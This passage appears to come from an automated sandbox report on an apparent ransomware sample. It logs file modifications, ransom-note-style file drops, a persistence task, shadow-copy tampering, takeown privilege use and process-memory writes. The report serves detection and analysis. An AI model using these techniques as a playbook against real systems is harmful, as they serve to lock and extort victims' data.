(x86)\Google\Chrome\Application\83.0.4103.106\VisualElements\Logo.png 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Almaty 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\Bermuda 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\fonts\LucidaTypewriterRegular.ttf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Mozilla Firefox\xul.dll.sig 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\ru.pak 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Berlin 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_pt_BR.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.commands.nl_ja_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Iqaluit 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\PST8PDT 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-util-enumerations_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.workbench.nl_ja_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Lindeman 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_fr.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\eclipse.inf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\sound.properties 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\jamendo.luac 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annots.api 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\cmm\CIEXYZ.pf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Settings.zip 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\bin\ktab.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Winamac 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-sampler_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Ust-Nera 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4-dark.css 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_hu.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.win32.nl_ja_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Chatham 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.app_1.3.200.v20130910-1609.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Macquarie 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\modules\httprequests.luac 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Nicosia 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Class.zip 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Vevay 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Cambridge_Bay 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\ECLIPSE_.SF 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\VDK10.SYX 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\oc\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Mozilla Firefox\updater.ini 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Panama 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Eucla 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jre7\lib\fonts\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\Real.mpp 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Microsoft Sync Framework\v1.0\Runtime\x64\resources\1033\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Baghdad 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\MANIFEST.MF 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Novosibirsk 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.nl_ja_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Choibalsan 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1636 schtasks.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1828 vssadmin.exe -
Modifies Control Panel 5 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Control Panel\Desktop reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Control Panel\Desktop\WallpaperStyle = "0" reg.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Control Panel\Desktop reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Control Panel\Desktop\TileWallpaper = "0" reg.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Control Panel\Desktop reg.exe -
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1936 NWgvgGUu.exe 1936 NWgvgGUu.exe 832 B4ux2Scs64.exe 832 B4ux2Scs64.exe 832 B4ux2Scs64.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 832 B4ux2Scs64.exe -
Suspicious use of AdjustPrivilegeToken 95 IoCs
description pid Process Token: SeDebugPrivilege 832 B4ux2Scs64.exe Token: SeLoadDriverPrivilege 832 B4ux2Scs64.exe Token: SeBackupPrivilege 1844 vssvc.exe Token: SeRestorePrivilege 1844 vssvc.exe Token: SeAuditPrivilege 1844 vssvc.exe Token: SeTakeOwnershipPrivilege 1792 takeown.exe Token: SeTakeOwnershipPrivilege 1176 takeown.exe Token: SeTakeOwnershipPrivilege 700 takeown.exe Token: SeTakeOwnershipPrivilege 1216 takeown.exe Token: SeIncreaseQuotaPrivilege 212 WMIC.exe Token: SeSecurityPrivilege 212 WMIC.exe Token: SeTakeOwnershipPrivilege 212 WMIC.exe Token: SeLoadDriverPrivilege 212 WMIC.exe Token: SeSystemProfilePrivilege 212 WMIC.exe Token: SeSystemtimePrivilege 212 WMIC.exe Token: SeProfSingleProcessPrivilege 212 WMIC.exe Token: SeIncBasePriorityPrivilege 212 WMIC.exe Token: SeCreatePagefilePrivilege 212 WMIC.exe Token: SeBackupPrivilege 212 WMIC.exe Token: SeRestorePrivilege 212 WMIC.exe Token: SeShutdownPrivilege 212 WMIC.exe Token: SeDebugPrivilege 212 WMIC.exe Token: SeSystemEnvironmentPrivilege 212 WMIC.exe Token: SeRemoteShutdownPrivilege 212 WMIC.exe Token: SeUndockPrivilege 212 WMIC.exe Token: SeManageVolumePrivilege 212 WMIC.exe Token: 33 212 WMIC.exe Token: 34 212 WMIC.exe Token: 35 212 WMIC.exe Token: SeIncreaseQuotaPrivilege 212 WMIC.exe Token: SeSecurityPrivilege 212 WMIC.exe Token: SeTakeOwnershipPrivilege 212 WMIC.exe Token: SeLoadDriverPrivilege 212 WMIC.exe Token: SeSystemProfilePrivilege 212 WMIC.exe Token: SeSystemtimePrivilege 212 WMIC.exe Token: SeProfSingleProcessPrivilege 212 WMIC.exe Token: SeIncBasePriorityPrivilege 212 WMIC.exe Token: SeCreatePagefilePrivilege 212 WMIC.exe Token: SeBackupPrivilege 212 WMIC.exe Token: SeRestorePrivilege 212 WMIC.exe Token: SeShutdownPrivilege 212 WMIC.exe Token: SeDebugPrivilege 212 WMIC.exe Token: SeSystemEnvironmentPrivilege 212 WMIC.exe Token: SeRemoteShutdownPrivilege 212 WMIC.exe Token: SeUndockPrivilege 212 WMIC.exe Token: SeManageVolumePrivilege 212 WMIC.exe Token: 33 212 WMIC.exe Token: 34 212 WMIC.exe Token: 35 212 WMIC.exe Token: SeTakeOwnershipPrivilege 1680 takeown.exe Token: SeTakeOwnershipPrivilege 676 takeown.exe Token: SeTakeOwnershipPrivilege 1812 takeown.exe Token: SeTakeOwnershipPrivilege 984 takeown.exe Token: SeTakeOwnershipPrivilege 756 takeown.exe Token: SeTakeOwnershipPrivilege 964 takeown.exe Token: SeTakeOwnershipPrivilege 2044 takeown.exe Token: SeTakeOwnershipPrivilege 1680 takeown.exe Token: SeTakeOwnershipPrivilege 760 takeown.exe Token: SeTakeOwnershipPrivilege 952 takeown.exe Token: SeTakeOwnershipPrivilege 280 takeown.exe Token: SeTakeOwnershipPrivilege 1896 takeown.exe Token: SeTakeOwnershipPrivilege 1812 takeown.exe Token: SeTakeOwnershipPrivilege 1840 takeown.exe Token: SeTakeOwnershipPrivilege 1292 takeown.exe Token: SeTakeOwnershipPrivilege 2044 takeown.exe Token: SeTakeOwnershipPrivilege 524 takeown.exe Token: SeTakeOwnershipPrivilege 1156 takeown.exe Token: SeTakeOwnershipPrivilege 676 takeown.exe Token: SeTakeOwnershipPrivilege 364 takeown.exe Token: SeTakeOwnershipPrivilege 1488 takeown.exe Token: SeTakeOwnershipPrivilege 1828 takeown.exe Token: SeTakeOwnershipPrivilege 224 takeown.exe Token: SeTakeOwnershipPrivilege 1068 takeown.exe Token: SeTakeOwnershipPrivilege 1836 takeown.exe Token: SeTakeOwnershipPrivilege 700 takeown.exe Token: SeTakeOwnershipPrivilege 1080 takeown.exe Token: SeTakeOwnershipPrivilege 1368 takeown.exe Token: SeTakeOwnershipPrivilege 1472 takeown.exe Token: SeTakeOwnershipPrivilege 1820 takeown.exe Token: SeTakeOwnershipPrivilege 1812 takeown.exe Token: SeTakeOwnershipPrivilege 1920 takeown.exe Token: SeTakeOwnershipPrivilege 1240 takeown.exe Token: SeTakeOwnershipPrivilege 236 takeown.exe Token: SeTakeOwnershipPrivilege 232 takeown.exe Token: SeTakeOwnershipPrivilege 1960 takeown.exe Token: SeTakeOwnershipPrivilege 948 takeown.exe Token: SeTakeOwnershipPrivilege 1180 takeown.exe Token: SeTakeOwnershipPrivilege 984 takeown.exe Token: SeTakeOwnershipPrivilege 904 takeown.exe Token: SeTakeOwnershipPrivilege 320 takeown.exe Token: SeTakeOwnershipPrivilege 1032 takeown.exe Token: SeTakeOwnershipPrivilege 1224 takeown.exe Token: SeTakeOwnershipPrivilege 1896 takeown.exe Token: SeTakeOwnershipPrivilege 752 takeown.exe Token: SeTakeOwnershipPrivilege 524 takeown.exe -
Suspicious use of WriteProcessMemory 4362 IoCs
description pid Process procid_target PID 672 wrote to memory of 1916 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 27 PID 672 wrote to memory of 1916 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 27 PID 672 wrote to memory of 1916 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 27 PID 672 wrote to memory of 1916 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 27 PID 672 wrote to memory of 1936 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 29 PID 672 wrote to memory of 1936 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 29 PID 672 wrote to memory of 1936 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 29 PID 672 wrote to memory of 1936 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 29 PID 672 wrote to memory of 836 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 33 PID 672 wrote to memory of 836 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 33 PID 672 wrote to memory of 836 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 33 PID 672 wrote to memory of 836 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 33 PID 672 wrote to memory of 980 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 34 PID 672 wrote to memory of 980 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 34 PID 672 wrote to memory of 980 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 34 PID 672 wrote to memory of 980 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 34 PID 836 wrote to memory of 760 836 cmd.exe 37 PID 836 wrote to memory of 760 836 cmd.exe 37 PID 836 wrote to memory of 760 836 cmd.exe 37 PID 836 wrote to memory of 760 836 cmd.exe 37 PID 980 wrote to memory of 1372 980 cmd.exe 38 PID 980 wrote to memory of 1372 980 cmd.exe 38 PID 980 wrote to memory of 1372 980 cmd.exe 38 PID 980 wrote to memory of 1372 980 cmd.exe 38 PID 836 wrote to memory of 1816 836 cmd.exe 39 PID 836 wrote to memory of 1816 836 cmd.exe 39 PID 836 wrote to memory of 1816 836 cmd.exe 39 PID 836 wrote to memory of 1816 836 cmd.exe 39 PID 836 wrote to memory of 744 836 cmd.exe 40 PID 836 wrote to memory of 744 836 cmd.exe 40 PID 836 wrote to memory of 744 836 cmd.exe 40 PID 836 wrote to memory of 744 836 cmd.exe 40 PID 672 wrote to memory of 1564 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 41 PID 672 wrote to memory of 1564 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 41 PID 672 wrote to memory of 1564 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 41 PID 672 wrote to memory of 1564 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 41 PID 1564 wrote to memory of 972 1564 cmd.exe 44 PID 1564 wrote to memory of 972 1564 cmd.exe 44 PID 1564 wrote to memory of 972 1564 cmd.exe 44 PID 1564 wrote to memory of 972 1564 cmd.exe 44 PID 1564 wrote to memory of 836 1564 cmd.exe 45 PID 1564 wrote to memory of 836 1564 cmd.exe 45 PID 1564 wrote to memory of 836 1564 cmd.exe 45 PID 1564 wrote to memory of 836 1564 cmd.exe 45 PID 1372 wrote to memory of 364 1372 wscript.exe 46 PID 1372 wrote to memory of 364 1372 wscript.exe 46 PID 1372 wrote to memory of 364 1372 wscript.exe 46 PID 1372 wrote to memory of 364 1372 wscript.exe 46 PID 1564 wrote to memory of 972 1564 cmd.exe 48 PID 1564 wrote to memory of 972 1564 cmd.exe 48 PID 1564 wrote to memory of 972 1564 cmd.exe 48 PID 1564 wrote to memory of 972 1564 cmd.exe 48 PID 364 wrote to memory of 1636 364 cmd.exe 49 PID 364 wrote to memory of 1636 364 cmd.exe 49 PID 364 wrote to memory of 1636 364 cmd.exe 49 PID 364 wrote to memory of 1636 364 cmd.exe 49 PID 972 wrote to memory of 2000 972 cmd.exe 50 PID 972 wrote to memory of 2000 972 cmd.exe 50 PID 972 wrote to memory of 2000 972 cmd.exe 50 PID 972 wrote to memory of 2000 972 cmd.exe 50 PID 2000 wrote to memory of 832 2000 B4ux2Scs.exe 51 PID 2000 wrote to memory of 832 2000 B4ux2Scs.exe 51 PID 2000 wrote to memory of 832 2000 B4ux2Scs.exe 51 PID 2000 wrote to memory of 832 2000 B4ux2Scs.exe 51 PID 1372 wrote to memory of 1180 1372 wscript.exe 52 PID 1372 wrote to memory of 1180 1372 wscript.exe 52 PID 1372 wrote to memory of 1180 1372 wscript.exe 52 PID 1372 wrote to memory of 1180 1372 wscript.exe 52 PID 1180 wrote to memory of 1080 1180 cmd.exe 54 PID 1180 wrote to memory of 1080 1180 cmd.exe 54 PID 1180 wrote to memory of 1080 1180 cmd.exe 54 PID 1180 wrote to memory of 1080 1180 cmd.exe 54 PID 940 wrote to memory of 1680 940 taskeng.exe 56 PID 940 wrote to memory of 1680 940 taskeng.exe 56 PID 940 wrote to memory of 1680 940 taskeng.exe 56 PID 1680 wrote to memory of 1828 1680 cmd.exe 58 PID 1680 wrote to memory of 1828 1680 cmd.exe 58 PID 1680 wrote to memory of 1828 1680 cmd.exe 58 PID 672 wrote to memory of 1924 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 59 PID 672 wrote to memory of 1924 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 59 PID 672 wrote to memory of 1924 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 59 PID 672 wrote to memory of 1924 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 59 PID 1924 wrote to memory of 1064 1924 cmd.exe 61 PID 1924 wrote to memory of 1064 1924 cmd.exe 61 PID 1924 wrote to memory of 1064 1924 cmd.exe 61 PID 1924 wrote to memory of 1064 1924 cmd.exe 61 PID 1924 wrote to memory of 1436 1924 cmd.exe 62 PID 1924 wrote to memory of 1436 1924 cmd.exe 62 PID 1924 wrote to memory of 1436 1924 cmd.exe 62 PID 1924 wrote to memory of 1436 1924 cmd.exe 62 PID 1924 wrote to memory of 1736 1924 cmd.exe 63 PID 1924 wrote to memory of 1736 1924 cmd.exe 63 PID 1924 wrote to memory of 1736 1924 cmd.exe 63 PID 1924 wrote to memory of 1736 1924 cmd.exe 63 PID 1736 wrote to memory of 1644 1736 cmd.exe 64 PID 1736 wrote to memory of 1644 1736 cmd.exe 64 PID 1736 wrote to memory of 1644 1736 cmd.exe 64 PID 1736 wrote to memory of 1644 1736 cmd.exe 64 PID 1924 wrote to memory of 360 1924 cmd.exe 65 PID 1924 wrote to memory of 360 1924 cmd.exe 65 PID 1924 wrote to memory of 360 1924 cmd.exe 65 PID 1924 wrote to memory of 360 1924 cmd.exe 65 PID 672 wrote to memory of 1952 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 66 PID 672 wrote to memory of 1952 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 66 PID 672 wrote to memory of 1952 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 66 PID 672 wrote to memory of 1952 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 66 PID 1952 wrote to memory of 548 1952 cmd.exe 68 PID 1952 wrote to memory of 548 1952 cmd.exe 68 PID 1952 wrote to memory of 548 1952 cmd.exe 68 PID 1952 wrote to memory of 548 1952 cmd.exe 68 PID 1952 wrote to memory of 1384 1952 cmd.exe 69 PID 1952 wrote to memory of 1384 1952 cmd.exe 69 PID 1952 wrote to memory of 1384 1952 cmd.exe 69 PID 1952 wrote to memory of 1384 1952 cmd.exe 69 PID 1952 wrote to memory of 472 1952 cmd.exe 70 PID 1952 wrote to memory of 472 1952 cmd.exe 70 PID 1952 wrote to memory of 472 1952 cmd.exe 70 PID 1952 wrote to memory of 472 1952 cmd.exe 70 PID 472 wrote to memory of 1128 472 cmd.exe 72 PID 472 wrote to memory of 1128 472 cmd.exe 72 PID 472 wrote to memory of 1128 472 cmd.exe 72 PID 472 wrote to memory of 1128 472 cmd.exe 72 PID 1952 wrote to memory of 1756 1952 cmd.exe 73 PID 1952 wrote to memory of 1756 1952 cmd.exe 73 PID 1952 wrote to memory of 1756 1952 cmd.exe 73 PID 1952 wrote to memory of 1756 1952 cmd.exe 73 PID 672 wrote to memory of 1840 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 75 PID 672 wrote to memory of 1840 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 75 PID 672 wrote to memory of 1840 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 75 PID 672 wrote to memory of 1840 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 75 PID 1840 wrote to memory of 524 1840 cmd.exe 77 PID 1840 wrote to memory of 524 1840 cmd.exe 77 PID 1840 wrote to memory of 524 1840 cmd.exe 77 PID 1840 wrote to memory of 524 1840 cmd.exe 77 PID 1840 wrote to memory of 1736 1840 cmd.exe 78 PID 1840 wrote to memory of 1736 1840 cmd.exe 78 PID 1840 wrote to memory of 1736 1840 cmd.exe 78 PID 1840 wrote to memory of 1736 1840 cmd.exe 78 PID 1840 wrote to memory of 1244 1840 cmd.exe 79 PID 1840 wrote to memory of 1244 1840 cmd.exe 79 PID 1840 wrote to memory of 1244 1840 cmd.exe 79 PID 1840 wrote to memory of 1244 1840 cmd.exe 79 PID 1244 wrote to memory of 2044 1244 cmd.exe 80 PID 1244 wrote to memory of 2044 1244 cmd.exe 80 PID 1244 wrote to memory of 2044 1244 cmd.exe 80 PID 1244 wrote to memory of 2044 1244 cmd.exe 80 PID 1840 wrote to memory of 676 1840 cmd.exe 81 PID 1840 wrote to memory of 676 1840 cmd.exe 81 PID 1840 wrote to memory of 676 1840 cmd.exe 81 PID 1840 wrote to memory of 676 1840 cmd.exe 81 PID 672 wrote to memory of 548 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 82 PID 672 wrote to memory of 548 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 82 PID 672 wrote to memory of 548 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 82 PID 672 wrote to memory of 548 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 82 PID 548 wrote to memory of 1052 548 cmd.exe 84 PID 548 wrote to memory of 1052 548 cmd.exe 84 PID 548 wrote to memory of 1052 548 cmd.exe 84 PID 548 wrote to memory of 1052 548 cmd.exe 84 PID 548 wrote to memory of 1784 548 cmd.exe 85 PID 548 wrote to memory of 1784 548 cmd.exe 85 PID 548 wrote to memory of 1784 548 cmd.exe 85 PID 548 wrote to memory of 1784 548 cmd.exe 85 PID 548 wrote to memory of 700 548 cmd.exe 86 PID 548 wrote to memory of 700 548 cmd.exe 86 PID 548 wrote to memory of 700 548 cmd.exe 86 PID 548 wrote to memory of 700 548 cmd.exe 86 PID 700 wrote to memory of 436 700 cmd.exe 87 PID 700 wrote to memory of 436 700 cmd.exe 87 PID 700 wrote to memory of 436 700 cmd.exe 87 PID 700 wrote to memory of 436 700 cmd.exe 87 PID 548 wrote to memory of 1636 548 cmd.exe 88 PID 548 wrote to memory of 1636 548 cmd.exe 88 PID 548 wrote to memory of 1636 548 cmd.exe 88 PID 548 wrote to memory of 1636 548 cmd.exe 88 PID 672 wrote to memory of 1736 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 89 PID 672 wrote to memory of 1736 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 89 PID 672 wrote to memory of 1736 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 89 PID 672 wrote to memory of 1736 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 89 PID 1736 wrote to memory of 1244 1736 cmd.exe 91 PID 1736 wrote to memory of 1244 1736 cmd.exe 91 PID 1736 wrote to memory of 1244 1736 cmd.exe 91 PID 1736 wrote to memory of 1244 1736 cmd.exe 91 PID 1736 wrote to memory of 676 1736 cmd.exe 92 PID 1736 wrote to memory of 676 1736 cmd.exe 92 PID 1736 wrote to memory of 676 1736 cmd.exe 92 PID 1736 wrote to memory of 676 1736 cmd.exe 92 PID 1736 wrote to memory of 1572 1736 cmd.exe 93 PID 1736 wrote to memory of 1572 1736 cmd.exe 93 PID 1736 wrote to memory of 1572 1736 cmd.exe 93 PID 1736 wrote to memory of 1572 1736 cmd.exe 93 PID 1572 wrote to memory of 992 1572 cmd.exe 94 PID 1572 wrote to memory of 992 1572 cmd.exe 94 PID 1572 wrote to memory of 992 1572 cmd.exe 94 PID 1572 wrote to memory of 992 1572 cmd.exe 94 PID 1736 wrote to memory of 1068 1736 cmd.exe 95 PID 1736 wrote to memory of 1068 1736 cmd.exe 95 PID 1736 wrote to memory of 1068 1736 cmd.exe 95 PID 1736 wrote to memory of 1068 1736 cmd.exe 95 PID 672 wrote to memory of 320 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 96 PID 672 wrote to memory of 320 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 96 PID 672 wrote to memory of 320 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 96 PID 672 wrote to memory of 320 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 96 PID 320 wrote to memory of 548 320 cmd.exe 98 PID 320 wrote to 